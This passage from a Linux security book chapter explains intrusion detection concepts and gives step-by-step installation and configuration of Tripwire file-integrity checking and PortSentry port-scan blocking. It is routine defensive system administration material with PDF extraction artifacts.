system, then send you alerts +when an anomalous event occurs. +The following sections describe each of the IDS services in greater detail. +Traffic Identification +Perhaps the most important element of an IDS that logs network traffic is that it +can inform you about all details of a packet that enters your network.A host- +based IDS can identify the following items: +(cid:2) Protocol type The IDS will inform you about the nature of packets +on the network.It will report whether the packet is UDP,TCP,ICMP, +and so forth. +www.syngress.com + +138_linux_04 6/20/01 9:38 AM Page 201 +Implementing an Intrusion Detection System • Chapter 4 201 +(cid:2) Origin The source IP address of the system.Hopefully,this is a source +IP address that has not been spoofed. +(cid:2) Destination Where the packet was sent. +(cid:2) Source port If the packet is a UDP or TCP packet,the application will +tell you which port the originating host used. +(cid:2) Destination port For UDP and TCP packets,the port on the destina- +tion host. +(cid:2) Checksums The checksums that guard the integrity of the transmitted +packets. +(cid:2) Sequence numbers If,for example,your network host receives a +number of ping packets,the IDS can tell you the order in which they +were generated.Understanding the sequence numbers can help you +understand the nature of the attack. +(cid:2) Packet information Many IDS applications can delve deep into the +packet and analyze its contents. +One of the more useful elements of an IDS is that it can make educated +guesses about the nature of traffic.Part of the ability to monitor traffic is the +ability for the IDS to suggest that a portion of traffic may constitute a port scan +or other network security problem.This can help you take steps to block it by, +for example,reconfiguring the firewall or moving a network host. +Logging Enhancement +Logging enhancement is closely related to traffic identification,because most of +the time,the additional information discussed earlier is placed in some sort of log +file on the local system or on a remote system.Using enhanced logging informa- +tion,you can conduct tracebacks,which give you the ability to learn the source of +a network packet.Many times,however,achieving an accurate traceback is not +possible,because more experienced hackers are able to spoof IP connections.Be +careful:You may think that you have identified and caught a malicious user,but +in fact,the person with the suspect IP address and host name may know nothing +about the attacks waged against you. +An IDS provides a detailed audit trail.As a security administrator,it is your +job to become a forensics expert—you get to slice open a connection log or +packet and then view it for suspicious activity.Sometimes,this practice can be +quite tedious,but the payoff is that you get peace of mind knowing the exact +nature of packets entering your network and network hosts. +www.syngress.com + +138_linux_04 6/20/01 9:38 AM Page 202 +202 Chapter 4 • Implementing an Intrusion Detection System +An IDS stores its information in several places: +(cid:2) System logs Many IDS applications are configured to send messages +directly to pre-existing system log files—such as /var/log/messages and +/var/log/security—in Red Hat Linux,either directly or through syslog. +(cid:2) Simple text files and directories Directories and text files that act +just like /var/log/messages,but are specifically created by the IDS appli- +cation.Sometimes,the IDS will create a separate directory for each new +host it detects.Each directory could,for example,be named after the IP +address of each host.The IDS will then populate the appropriate direc- +tory with separate files for each specific protocol used.This way,you can +then identify the nature of the traffic on the network. +(cid:2) Databases The most elegant way to store information is in a database.A +database generally stores the information in a far more logical way,and it +allows the information to be searched efficiently.After the information is +stored in a database,it is then possible to port this information to a Web +server,which makes it possible to read IDS information from any Web +browser or use third-party analysis tools to analyze the gathered data. +Threshold Enforcement +When a threshold is met,an IDS can do several things.It can send the event to a +special alert log file,send an alert to a remote system,send an e-mail,or even +reconfigure a host or a firewall.Not all IDS applications have this ability,how- +ever.Many IDS applications can be configured to inform you about sudden +increases in traffic,or if traffic appears threatening.For example,you can con- +figure your IDS to log ICMP traffic into a special database or to inform you via +e-mail about a specific login. +File System Integrity Verification +Host-based IDS applications such as Tripwire are able to take a snapshot of your +file systems,then compare their later condition to that snapshot.You can then +identify whether certain sensitive files have been altered.Such file system verifi- +cation software is useful for guarding against Trojan horses,which are malicious +applications designed to appear as legitimate applications,such as su,ls,and ps. +If you have been able to protect your operating system with an application +such as Tripwire,all but the most subtle and sophisticated attempts to substitute a +Trojan horse for a legitimate application will fail. +www.syngress.com + +138_linux_04 6/20/01 9:38 AM Page 203 +Implementing an Intrusion Detection System • Chapter 4 203 +Which IDS Strategy Is Best? +By now,you probably get the idea that no one IDS application or method is “the +best.”Many different types of IDS applications exist,and as with any other task, +you must use the right tool for the right job.Security professionals commonly +say that,for example,PortSentry is a bit crude compared to Snort.This is not the +case at all.PortSentry is a very useful tool,as long as you use it as intended:It is +designed to identify traffic and log it to a central console.It can then send alerts +and block traffic.However,it is not designed to detect attacks as they travel across +your network.To detect traffic as it passes across your network,you will want a +network-based IDS,such as Snort. +Thus,arguing that one application is more useful or sophisticated than +another is impractical.Rather,it is appropriate to say that PortSentry is useful +when protecting a specific host,and that Snort is useful for detecting problems +with network traffic.If you combine PortSentry with Tripwire,you will have a +system that informs you of all port scans and file changes. +Thus far,you have learned about the hardware and software necessary to +implement an IDS.Don’t forget that the “wetware”—the people who implement +the IDS—are an essential component to your success.In fact,you and your well- +trained support staff are probably the most important part of an IDS.The IDS +hardware and software are really nothing more than tools. +Network-Based IDS Applications and Firewalls +No IDS can act as a replacement for a firewall.A firewall is the primary means of +establishing perimeter security,as you will see in Chapter 9.A firewall can block +and allow traffic,depending upon your wishes.IDS technology is not at all suited +for this.The primary function of an IDS is to monitor internal network traffic. +An IDS can,however,act as a supplement to a firewall,because it can help +you monitor traffic on the internal network.Sometimes,it may be useful to place +an IDS application outside the firewall,or in the DMZ so that you can learn +more about the attacks waged against the firewall itself.However,in this case,the +IDS is not acting as a firewall in any way.In such cases,your IDS is acting as an +attack detection device. +One of the most common strategies is the practice of allowing your IDS +application to reconfigure the firewall in case of an attack.For example,the IDS +application can communicate with the firewall and ask it to automatically close a +port or block a host.This functionality,however,is not readily available in open +source firewalls.You will have to create custom scripts to do this,right now. +www.syngress.com + +138_linux_04 6/20/01 9:38 AM Page 204 +204 Chapter 4 • Implementing an Intrusion Detection System +IDS Applications +Table 4.2 provides a list of common IDS applications:Some of these are not +open source IDS applications,but they are listed to give you an idea of what you +can choose. +Table 4.2 Common IDS Applications +IDS Product Name Description +NetProwler (Symantec) A network-based IDS product designed +www.Symantec.com to provide alerts and to work with +additional Symantec offerings, such as +Enterprise Security Manager (ESM). +RealSecure (Internet Security Considered to be one of the first +Systems) www.iss.net commercial network-based IDS +applications. +eTrust Intrusion Detection A popular network-based IDS applica- +(Computer Associates) www.cai.com tion, due to its ease of use. +Network Flight Recorder One of the more highly-regarded +(NFR Security) www.nfr.com network-based IDS applications, mainly +because its developers have written the +code for specific hardware platforms. +This IDS application has roots in the +open source community. +Snort (open source) www.snort.org Widely considered to be one of the +more flexible and reliable lightweight +network-based IDS applications. +Shadow (open source) A collection of Perl scripts and Web +www.nswc.navy.mil/ISSEC/CID pages that can help you log and +analyze scanning attacks that have +occurred over a long period of time +(for example, port scans that have +occurred over a period of days or +weeks). +Tripwire (Tripwire, Inc., open source) A host-based IDS designed to inform +www.tripwire.com you concerning files that have +changed. +Ettercap (open source) A network-based sniffer designed to +http://ettercap.sourceforge.net/ work in switched networks. +PortSentry (Psion, Inc.) A host-based IDS application that +www.psionic.com/abacus/portsentry listens to log files. It detects port scans +and www.psionic.com/download and responds to them. +Continued +www.syngress.com + +138_linux_04 6/20/01 9:38 AM Page 205 +Implementing an Intrusion Detection System • Chapter 4 205 +Table 4.2 Continued +IDS Product Name Description +Hostsentry (Psion, Inc.) Another host-based IDS application +www.psionic.com/download that specifically searches log files for +activity. If activity fits a signature, then +Hostsentry will send an alert. +Many more IDS applications exist.You can learn more about additional open +source IDS applications at the following sites: +(cid:2) www.securityfocus.com +(cid:2) http://packetstorm.securify.com +(cid:2) www.linuxsecurity.com. +General Dependencies for Open Source IDS Applications +Most open source IDS applications require several supporting applications.These +often include: +(cid:2) Tcpdump www.tcpdump.org +(cid:2) Perl www.perl.com +(cid:2) PreHypertext Processor, or PHP www.php.net +(cid:2) Apache Server www.apache.org +(cid:2) Databases, including PostgreSQL www.postgresql.org or +www.pgsql.com and MySQL www.mysql.com +(cid:2) Secure Shell www.openssh.org +(cid:2) Supporting libraries, such as Libnet,Tcl/Tk, and pcap +The IDS you choose will inform you concerning any additional applications +or libraries you require.Now that you have received a rundown of the important +IDS elements,you can begin implementing them on your Linux systems. +www.syngress.com + +138_linux_04 6/20/01 9:38 AM Page 206 +206 Chapter 4 • Implementing an Intrusion Detection System +NOTE +One of the most important things to remember in regards to an IDS is +that it should never affect system or network performance. Unless you +have a compelling reason, you should not “double up” on a machine by +making it, say, a firewall and an IDS application at the same time. An +IDS can be an effective supplement to a firewall. Just make sure that +the IDS resides on a separate system, and you will not encounter any +performance problems. +Installing Tripwire to +Detect File Changes +Tripwire is one of the most popular applications for determining when a file or +directory has been altered.It scans your system’s hard drive and creates a database. +After its database has been created,Tripwire can conduct regular scans of your +hard drive and inform you (via e-mail or a log file) about any changes.Tripwire +does not inform you concerning changes as soon as they occur.Rather,Tripwire +can be placed into integrity checking mode and will then inform you of any +changes to the file.After it is working properly,you can then be confident that +you know about any and all changes that have occurred on your hard drive.To use +Tripwire,you should follow this process (which is briefly illustrated in Figure 4.2): +1. Install the binaries and configuration files. +2. Edit the /etc/tripwire/twpol.txt file. +3. Run the /etc/tripwire/twinstall.sh program,which creates a key pair +and then allows you to secure all configuration files. +4. Run Tripwire in database initialization mode.Tripwire will scan your +system and use message digests to create signatures for the files you +specify.Whenever Tripwire creates its database,it is said to enter database +initialization mode. +5. You can then set Tripwire to rescan these files and compare their signa- +tures to the signatures stored in the database.This is called integrity +checking mode. If a file has changed,Tripwire can inform you about the +change.By default,you can check a text file.You can,of course,specify +additional options,including having Tripwire send you an e-mail +informing you of any changes. +www.syngress.com + +138_linux_04 6/20/01 9:38 AM Page 207 +Implementing an Intrusion Detection System • Chapter 4 207 +Figure 4.2 Using Tripwire +Tripwire +Database Compares +Created Change Occurs Existing Drive Alert +State to Its +Database +Network Host Protected by Tripwire +SECURITY ALERT! +Although Tripwire has a “file integrity mode,” Tripwire is not really an +integrity checker in the classic sense. It does not, for example, test the +file’s stability or inode number or any other aspect in regards to file +storage. Tripwire simply compares a file’s new signature with that taken +when the database was created. Other tools may be used to check the +integrity of a file’s permissions and ownership information. +Tripwire Dependencies +Tripwire does not require any specialized daemons or applications.All of the +following are standard to most Linux implementations: +(cid:2) sed +(cid:2) grep +(cid:2) awk +(cid:2) gzip version 2.3 or higher +(cid:2) tar +(cid:2) gawk +www.syngress.com + +138_linux_04 6/20/01 9:38 AM Page 208 +208 Chapter 4 • Implementing an Intrusion Detection System +Availability +You can obtain Tripwire from the following sources: +(cid:2) At www.tripwire.org +(cid:2) At http://sourceforge.net/projects/tripwire +(cid:2) On the accompanying CD (tripwire-2.3-47.i386.tar.gz) +A commercial version is available at the www.tripwire.com site.This site also +offers for-fee services for those who can afford to hire consultants to configure +Tripwire.The developers of Tripwire wrote the application to work on many +platforms,including most Linux flavors (Red Hat,SuSE,Slackware,Caldera,and +so forth).You can download Tripwire as a tarball or in the RPM format.As of +this writing,the Tripwire site recommends installing the RPM for Linux systems. +Deploying Tripwire +To properly configure Tripwire,you must take the following three steps: +1. Install the Tripwire binaries and configuration files. +2. Configure the Tripwire policy file. +3. Create the database by conducting an initial run of the Tripwire binary. +After you have taken these three steps,you can then run the tripwire binary +from cron so that it conducts regular scans. +Tripwire Files +Here is a list of Tripwire files that you will become familiar with as you deploy +them in your Linux/Unix systems: +(cid:2) /usr/sbin/tripwire The tripwire binary responsible for reading, +creating,and updating the database. +(cid:2) /etc/tripwire/twpol.txt The Tripwire policy configuration file.This +file is not the actual file Tripwire uses when it runs.Rather,it contains +the instructions that determine what the /etc/tw.pol file will contain. +(cid:2) /etc/tw.pol The signed Tripwire policy file.Tripwire reads this file to +determine what it will place into its database. +www.syngress.com + +138_linux_04 6/20/01 9:38 AM Page 209 +Implementing an Intrusion Detection System • Chapter 4 209 +(cid:2) /etc/tripwire/twinstall.sh The file that signs the /etc/tripwire/ +twpol.txt and /etc/tripwire/twcfg.txt files.It also configures password +information for Tripwire. +(cid:2) /etc/tripwire/twcfg.txt Configures the environment for the +/usr/sbin/tripwire binary.You will usually not need to edit this file. +(cid:2) /var/lib/tripwire/hostname.twd The default location of the +Tripwire database file.You can change this location,if you wish.All you +have to do is tell the Tripwire binary the location of the database.In +fact,storing the database on a different device than the hard drive is a +good idea.The first thing a reasonably talented hacker will do after +obtaining root is find and erase the database.In the past,many systems +administrators would place the database on a write-protected floppy +disk.However,many Tripwire databases are very large (over 2 MB),so +placing the database onto a more permanent read-only volume—such as +a CD—is far more practical.A CD is also more appropriate,because a +floppy disk is bound to fail more frequently than a CD. +Tripwire Installation Steps +Figure 4.3 shows the steps to take when installing the Tripwire binary.First,the +rpm -qpil command lists the contents of the RPM package.Then,when you +install Tripwire using the rpm -ivh command,you will be informed that you +must edit the /etc/trwipwire/twpol.txt file.Then,run the /etc/tripwire/ +twinstall.sh command to create a key pair and then sign all Tripwire files for the +sake of security.Make sure that you do not forget the password you choose,or +you will not be able to use Tripwire. +Although installation seems straightforward,make sure to read the configura- +tion information so that you can customize Tripwire to suit your own situation. +Configuring the Tripwire Policy File +The Tripwire policy file,/etc/tripwire.twpol.txt,is configured to read all files +found in a Red Hat 7.x installation.You can use a simple text editor to customize +the file.You have many options available to you.Table 4.3 shows the most +important options. +www.syngress.com + +138_linux_04 6/20/01 9:38 AM Page 210 +210 Chapter 4 • Implementing an Intrusion Detection System +Figure 4.3 Installing Tripwire +Table 4.3 Tripwire Configuration File Examples +Option Description +/etc/shadow -> $(IgnoreNone); Any file followed by the +IgnoreNone argument will be +checked by Tripwire’s “paranoid +mode,” which means that any +and all changes will be reported +to you. You must place a semi- +colon after any directory name. +!/proc; Informs Tripwire to ignore the +/proc directory. It is recom- +mended that you not check the +integrity of the /proc directory, +because it is a virtual file system. +Continued +www.syngress.com + +138_linux_04 6/20/01 9:38 AM Page 211 +Implementing an Intrusion Detection System • Chapter 4 211 +Table 4.3 Continued +Option Description +!/~james/Desktop; This particular setting shows how +it is possible to ignore all con- +tents of a subdirectory (in this +case, the Desktop subdirectory of +the james home directory. The +Desktop directory is for the X +Window environment, and will +likely change often. It is also +possible to specify a single file, as +opposed to a single directory. +“/home/fred/big file” -> +pingus; This syntax shows how it is pos- +sible to specify a file that has +spaces in it. +/etc -> +ug (emailto=james@stanger.com, Allows you to have your system +severity=50); send you an e-mail report in case +anything in the /etc/ directory +changes. Such options are useful +only if you are reasonably sure +that you do not want any +changes to occur on the /etc/ +directory (or whatever directory +you wish to specify). +/var/log/messages -> $(Growing); Tells Tripwire that the it is +expected for the /var/log/ +messages file to grow in size. +However, Tripwire will still inform +you if the file gets smaller or is +erased. +/etc -> +ug (rulename=etc); Tells Tripwire to check the /etc +directory for basic changes in +user and group settings and then +organizes any output into a +section named etc. +The default file,/etc/tripwire/twpol.txt,contains a rather complex structure +that has the following variables,among others: +(cid:2) SEC_CRIT The same as $(IgnoreNone) -Sha; which is for files that +cannot be changed. +www.syngress.com + +138_linux_04 6/20/01 9:38 AM Page 212 +212 Chapter 4 • Implementing an Intrusion Detection System +(cid:2) SIG_LOW The same as severity 33; which is for files of lesser +importance. +(cid:2) SIG_MED The same as severity 66; which is for files of moderate +importance. +(cid:2) SIG_HI The same as severity 100; which is for files of highest +importance. +You can change these values at will.For more specific information about +the options,consult the Tripwire man page,or read the /usr/doc/tripwire/ +policyguide.txt file. +If,for example,you have just installed Cheops to monitor your network, +include the path to the Cheops binary and databases.Then,after you run +Tripwire,you can be reasonably sure that no one has replaced this file with a +Trojan.Also,you may not want to scan the entire hard drive.Rather,you may +want to concentrate only on certain commonly-used binaries. +You should then use /usr/sbin/twadmin to sign the configuration file you are +using.This way,you will be able to test it to see if someone has altered the file +without your permission. +Creating the Tripwire Policy File +After you have installed Tripwire and edited the /etc/tripwire/twpol.txt,you are +ready to begin the initial scan.Simply run the /etc/tripwire/twinstall.sh script, +which should already be executable.It will then create the Tripwire configuration +file.The twinstall.sh process will do the following: +(cid:2) Create site and local host key pairs,which allow you to ensure that your +Tripwire files are secure. +(cid:2) Create the /etc/twpol file,which is what Tripwire will use when it +enters database initialization mode. +(cid:2) Create backup copies of the /etc/twpol.txt file,which you should secure +so that no one can alter them. +Database Initialization Mode +After you have created a policy file,you can then enter database initialization +mode by using the following command: +tripwire --init +www.syngress.com + +138_linux_04 6/20/01 9:38 AM Page 213 +Implementing an Intrusion Detection System • Chapter 4 213 +This command creates the actual Tripwire database,as shown in Figure 4.4. +Figure 4.4 Creating the Tripwire Database +Tripwire +Database +The twadmin +Command +Network Host +You will then be asked to enter your passphrases.It is possible to specify addi- +tional options at the command line,but this is usually not necessary.Tripwire will +then default to reading its configuration file (/etc/tripwire/tw.pol).If you wish to +use an alternative policy file named altpolfile.pol,you can issue the following +command: +tripwire --init --polfile altpolfile.pol +For additional information,you can read the tripwire man page,or you can +issue the following command: +tripwire --help init +Depending upon the number of directories and files you specify,creating the +database can take a significant period of time.For example,it took over an hour +to create the database for an 18GB file on an 850Mhz Pentium III system using +the default configuration file.After editing the policy configuration file to check +only selected files in the /etc/ directory (such as /etc/passwd,/etc/shadow,and +the cron directories),initializing the database took about a minute. +www.syngress.com + +138_linux_04 6/20/01 9:38 AM Page 214 +214 Chapter 4 • Implementing an Intrusion Detection System +Testing E-Mail Capability +Earlier,you learned how to enter an emailto= entry into the policy configuration +file.To ensure that your version of Tripwire can actually send e-mail,issue the +following command,making sure to substitute your own e-mail address: +tripwire -–test -–email youraccount@mailhost.com +Tripwire will send a simple test message to the account you specify.If you +receive the e-mail,you know Tripwire is working. +Integrity Checking Mode +After you have created the database,you can run Tripwire in integrity checking +mode.You can either run the command manually or create a cron entry.To start +Tripwire in integrity checking mode,issue the following command: +tripwire --check +It generally takes as much time to check the hard drive as it did to create the +database.About the only significant difference between creating the database and +checking integrity using the -check option is that you will not have to enter a +password.If you have configured Tripwire to send an e-mail message by placing +an emailto= entry into the /etc/tripwire/twpol.txt file,use the -M option: +tripwire --check -M +To automate the process,create a simple text file named tripwire and enter the +following text: +#!/bin/bash +# Script to run Tripwire every week. +/usr/sbin/tripwire --check -s -M +The added option,-s,has Tripwire forego sending a report to standard +output.You will not need to see this output,because this script will likely be run +when you are not logged on.Cron runs as root,so this command will run as +long as you use chmod to make it executable,and you place the file into any of +the following directories: +(cid:2) /etc/cron.hourly/ +(cid:2) /etc/cron.daily/ +www.syngress.com + +138_linux_04 6/20/01 9:38 AM Page 215 +Implementing an Intrusion Detection System • Chapter 4 215 +(cid:2) /etc/cron.weekly/ +(cid:2) /etc/cron.monthly/ +You can,of course,create a root-owned crontab file by using the crontab -e +command as root,or you can create the appropriate file for the /etc/cron.d/ +directory. +Specifying a Different Database +If you choose to burn the Tripwire database onto a CD,you will have to specify +the location of the database: +/usr/sbin/tripwire --check -d /dev/cdrom/hostname.twd -s -M +Reading Reports +If you choose not to mail reports to your e-mail account,you can check them by +reading the report files Tripwire generates.Reports are stored in the /var/lib/ +tripwire/ directory.If you have not activated e-mail,you can read the report by +issuing the following command: +/usr/sbin/twprint --print-report –r +/var/lib/tripwire/report/filename.twr +Tripwire will create a separate report for each scan.File names are a combi- +nation of the host name and the time the report was generated. +Updating Tripwire to Account for +Legitimate Changes in the OS +Eventually,legitimate changes will occur to your operating system.These changes +will keep appearing in reports unless you update your database.Database update +mode allows you to update the database so that it no longer recognizes any dif- +ferences between itself and the operating system.Many systems administrators +make the rookie mistake of completely rewriting the database by using the +following command: +twadmin -–create-polfile /etc/tripwire/twpol.txt +www.syngress.com + +138_linux_04 6/20/01 9:38 AM Page 216 +216 Chapter 4 • Implementing an Intrusion Detection System +This command is a mistake because it also requires you to re-initialize (in +effect,rewrite) the entire database,which can result in lost information,especially +if a security breach has occurred.The proper way to update the Tripwire database +is to use the following command: +tripwire -m u -r /var/lib/tripwire/reportyourreport.twr +You will then be placed into “interactive mode,”which is where the report +will be opened in the vi editor.You can then scroll through the report and deter- +mine which events you wish to have Tripwire ignore.As you scroll down the text +file,you will see that each change has a checkbox with an X in it.Tripwire,for +some reason,calls this the ballot box. If you leave the X as is,the event will no +longer be reported.If you enter edit mode in vi (just press ESC and then the +letter I),you can erase the X,which means that Tripwire will still report the +event. +Updating the Policy +Updating the policy is different than updating the database.sometimes,you may +need to update your policy.If,for example,you install a new application,you +may want to ensure that these files are protected by Tripwire.To update the +policy,you would first edit the policy file (usually /etc/tripwire/twpol.txt) to suit +your needs,then issue the following command: +tripwire -m p /etc/tripwire/twpol.txt +You must use this option to update the /etc/tripwire/twpol.txt file.If you +change the policy file by manually editing the file and then use the twadmin +--create-polfile command to update the file,you will cause inconsistencies in +the database that can cause Tripwire to misreport information,even if you +re-initialize the database. +NOTE +Skipping the scan of the /proc directory is generally a good idea. Also, +because cron is such a powerful daemon, you should consider scanning +the cron directories and files in the /etc/ directory. Directories include +/etc/cron.d, /etc/cron.daily, /etc/cron.hourly, /etc/cron.monthly, and +/etc/cron.weekly. Make sure that you also scan the crontab file. +www.syngress.com + +138_linux_04 6/20/01 9:38 AM Page 217 +Implementing an Intrusion Detection System • Chapter 4 217 +What Do I Do if I Find a Discrepancy? +If you find that a file has been altered without your permission,you can do the +following: +(cid:2) Edit the file so that it is back to its original configuration. +(cid:2) Replace the suspect file with a clean copy from a backup or installation +media. +(cid:2) Consider removing the altered system from the network. +(cid:2) Conduct a full audit of the operating system to ensure that additional +changes have not been made. +(cid:2) Change your system password. +Configuring Tripwire to Inform +You Concerning Changes +Now that you have an understanding of the moves required to make Tripwire +effective for you,it is time to actually implement the application.As with any +Linux/Unix application,you will have to do quite a bit of “tweaking”to make +this application suit your needs. +Exercise: Installing Tripwire +1. Obtain the Tripwire RPM file either from the CD that accompanies this +book (tripwire-2.3-47.i386.tar.gz—the file looks like a tarball,but it is +actually a gzipped RPM),or from www.tripwire.org,or from the other +sites discussed earlier in this chapter. +2. Make a copy of the /etc/tripwire/twpol.txt file and call it /etc/ +tripwire/twpol.orig.You are going to edit the original file,and you +want to have the original handy in case something goes wrong. +3. After you are finished installing,open the /etc/tripwire/twpol.txt file +and edit it to your needs.We highly recommend that you eliminate all +references to files that do not actually belong on your system.We also +highly recommend that you use the ! sign to ensure that the /proc +directory is not read.Finally,add the following line,which has Tripwire +report any and all changes to the /etc/shadow file: +www.syngress.com + +138_linux_04 6/20/01 9:38 AM Page 218 +218 Chapter 4 • Implementing an Intrusion Detection System +/etc/shadow -> +pinusgamctdbCMSH +(emailto=youraccount@youremailserver.com); +Make sure that you enter this information all in one line,and that +you substitute your own e-mail information. +4. Run the /etc/tripwire/twinstall.sh script and enter the site and local +passwords.Write down the passwords here,in case you forget: +Site password:______________________________________________ +Local password:_____________________________________________ +5. When you are finished,initialize the database using the instructions +given earlier in this chapter. +6. Test whether Tripwire can send e-mail using the instructions given +earlier in this chapter. +7. After you know that Tripwire is able to send e-mail,test your configura- +tion by adding a new user and changing the password.Unless you add +an emailto= value to the /etc/passwd entry,you will have to change the +password in order to alter the /etc/shadow file. +8. Issue the following command to have Tripwire perform an integrity +check: +tripwire --check -M +9. After some time,Tripwire will complete its integrity scan.Check your +e-mail to view a report.Alternatively,use the twprint command: +twprint -–print-report –r /var/lib/tripwire/report/reportfile.twr +|less +You will see that Tripwire will inform you about the change.Press q +to quit the less command. +10. Run Tripwire again and perform an integrity check.You will see a very +similar message. +11. You obviously know about this addition to the /etc/shadow file,and +probably do not want to be informed about this change.Issue the +following command to update the database: +tripwire –m u –r /var/lib/tripwire/report/reportfile.twr +www.syngress.com + +138_linux_04 6/20/01 9:38 AM Page 219 +Implementing an Intrusion Detection System • Chapter 4 219 +Note that the file you specify should be the report from the latest +integrity check. +12. You are now in vi,viewing the report.Deselect any file that you wish to +continue hearing about.Otherwise,make no changes to the file.If you +wish to make a change to the file,press ESC then I to enter insert +mode.When you are finished,press CTRL,then ZZ to exit. +13. After you have exited,you will be asked for the password to the +database.Enter it now. +14. Run Tripwire again in integrity check mode.You will see that any e- +mail message you receive no longer contains a detailed reference to the +/etc/shadow file.You will,however,see a message informing you about +the fact that the file’s access time has changed.This is because Tripwire is +reading its own scan of the file.The fact that you no longer see informa- +tion about how the file has been changed means that the database has +been updated. +15. If you wish,modify the /etc/tripwire/twpol.txt file and eliminate the +access timestamp value (a) from the /etc/shadow entry.The newly edited +entry should read as follows: ++pinusgmctdbCMSH +16. Issue the following command to update the policy file: +tripwire –m p /etc/tripwire/twpol.txt +17. Run Tripwire in integrity check mode again.You will receive a report +that no files have changed. +You now have configured,deployed and updated Tripwire. +Exercise: Securing the Tripwire Database +1. Burn the database to a CD.You can use a CD-RW disk,although this +option is far less secure,because in theory someone could modify the +data on the CD-RW disk,but in practice that is not easy to do via the +network. +2. Modify your tripwire --check -M command so that are now reading +from the database on the CD. +www.syngress.com + +138_linux_04 6/20/01 9:38 AM Page 220 +220 Chapter 4 • Implementing an Intrusion Detection System +3. You now can be reasonably sure that your sensitive files and directories +are protected. +Exercise: Using Cron to Run Tripwire Automatically +1. As of this writing,Tripwire no longer runs automatically.Configure a +cron job so that Tripwire runs every week.Use the simple script dis- +cussed earlier in this lesson.If you wish,you can issue the crontab -e +command and enter the following: +5 0 * * * root /usr/bin/tripwire --check –M +This command will have Tripwire run daily at five minutes after +midnight. +2. Make sure that you specify the correct database file,if you have stored it +onto a CD. +3. You may not want Tripwire to send you any messages unless a problem +occurs.To make Tripwire remain silent until a problem occurs,add or +modify the MAILNOVIOLATIONS line to read as follows: +MAILNOVIOLATIONS=false +4. Issue the following command: +twadmin --create-cfgfile -S /etc/tripwire/site.key +/etc/tripwire/twcfg.txt +Now,you will no longer be notified unless a problem occurs. +5. When you are finished,removing all text-based configuration files is a +good idea.Keep backup copies on a floppy disk for future use. +You now have automated Tripwire to run every week.You can,of course, +create a crontab that runs this job more often or less often. +Deploying PortSentry to +Act as a Host-Based IDS +PortSentry is a host-based IDS application that monitors all open ports.It is an +effective tool if you wish to detect TCP and/or UDP port scans,and if you wish +www.syngress.com + +138_linux_04 6/20/01 9:38 AM Page 221 +Implementing an Intrusion Detection System • Chapter 4 221 +to have your host reconfigure itself in case of a port scan.You can also configure +PortSentry to do the following: +(cid:2) Drop all packets returning to a host using the route command +This is not the preferred option,but if you do not have Ipchains or +Ipfwadm support,you will have to use it. +(cid:2) Automatically update the /etc/hosts.deny file to block xinetd- +based connections This is useful if all of your system’s daemons are +started by xinetd. +(cid:2) Automatically use Ipchains or ipfwadm to block connections +This is the most comprehensive option,because it will block any and all +connections from a host PortSentry has identified as an attacker.You +should understand,however,that the 2.4 kernel does not support +Ipchains. +(cid:2) Log additional connection information By default,PortSentry logs +all of its observations and actions to the /var/log/messages file,and it +informs you concerning scans conducted by most popular applications, +such as Nmap.This includes most “half-open”SYN scans,as well as the +XMAS,NULL,and FIN scans.For more information,read the +README files that ship with the product.Because PortSentry acts +automatically,it is always revealing to check this file periodically to see +what hosts have scanned your system.Of course,monitoring this file is +wise,because PortSentry may generate false positives and block a host +that you actually wish to allow full access. +PortSentry is not distributed under the GNU General Public License (GPL). +However,it is freeware,and you can modify the source code for your own pur- +poses.However,you cannot give this modified source code to anyone else. +PortSentry will compile on any standard Linux system that has TCPWrapper and +Ipchains or Ipfw support.As mentioned earlier,you can obtain PortSentry from +www.psionic.com/abacus/portsentry. +Important PortSentry Files +All of the PortSentry files are located off of the /usr/local/psionic/portsentry/ +directory.These files include the following: +(cid:2) portsentry The actual daemon responsible for detecting attacks. +(cid:2) portsentry.conf The configuration file for the entire daemon. +www.syngress.com + +138_linux_04 6/20/01 9:38 AM Page 222 +222 Chapter 4 • Implementing an Intrusion Detection System +(cid:2) portsentry.blocked.stcp If you configure the portsentry.conf file to +block stealth attacks,this file will log systems that have been blocked. +(cid:2) portsentry.blocked.tcp A temporary file that informs you concerning +the systems blocked since the last time PortSentry was activated. +(cid:2) portsentry.history Contains detailed information concerning the hosts +that have been blocked. +(cid:2) portsentry.ignore Hosts that PortSentry will not respond to.This file +is necessary so that you do not forbid access to your own system.Also, +some default behavior from systems such as Microsoft Exchange boxes +and DNS servers can be mistaken for scans.Cutting off all communica- +tion to such systems would be a mistake if they are essential for your job +or for normal operation of your operating system. +Installing PortSentry +All files are owned by root,and the program must be started as root,because it +places your NIC into promiscuous mode.Generally,an application or daemon +must be started as root in order to do this.The /usr/local/psionic/portsentry/ +directory must be owned by root,and have “700”permissions.The +portsentry.ignore and portsentry.conf files need only have 600 (read and write by +owner) permissions. +Configuring PortSentry to Block Users +The /usr/local/psionic/portsentry/portsentry.conf file contains several fields. +First,you will find that the default setting has PortSentry bind only to certain +ports.Three predefined groups of ports are created for you.You can edit these at +will.However,you must have only one pair uncommented at a time.The +Advanced Stealth Scan Detection Options determine the port numbers that +PortSentry will monitor when you use the -stcp option to start PortSentry.By +default,PortSentry listens only to ports up to 1023.You can change this setting to +read all ports,but vulnerable ports are usually those that reside below 1023,so +you probably won’t need to alter these settings. +The Dropping Routes section allows you to determine how PortSentry will +deny connections.The KILL_ROUTE options allow you to configure various +system tools to actually do the work of denying hosts.PortSentry allows you to +use only one KILL_ROUTE option,so if you experience any troubles,check +www.syngress.com + +138_linux_04 6/20/01 9:38 AM Page 223 +Implementing an Intrusion Detection System • Chapter 4 223 +that you have not mistakenly uncommented multiple entries.The two most +useful KILL_ROUTE options are the following: +(cid:2) KILL_ROUTE="/sbin/ipchains -I input -s $TARGET$ -j +DENY -l" Uses Ipchains to identify the attacker (the attacker’s host IP +address is stored in the $TARGET$ value),then deny all incoming con- +nections from that host.This is the preferred option. +(cid:2) KILL_ROUTE="/sbin/route add -host $TARGET$ reject" Uses +the route command to reject all packets emanating from the target host. +After you uncomment either of these entries,PortSentry will do the rest.The +KILL_HOSTS_DENY entry allows you to deny connections to any host con- +trolled by xinetd.Two entries exist.For Red Hat 7.0,select the second entry, +which appears as follows: +KILL_HOSTS_DENY="ALL: $TARGET$ : DENY" +As with the KILL_ROUTE entries,after you uncomment these entries, +PortSentry will act automatically. +Optimizing PortSentry +to Sense Attack Types +There is more than one way to attack a system.Hackers can send UDP packets +to scan systems,or they can conduct full TCP scans or only “half-open”scans.As +a result,there is more than one way to start PortSentry.You can start PortSentry +in various ways,depending upon the types of attacks you wish to detect.For +example,if you note that many scanning attacks are being waged using 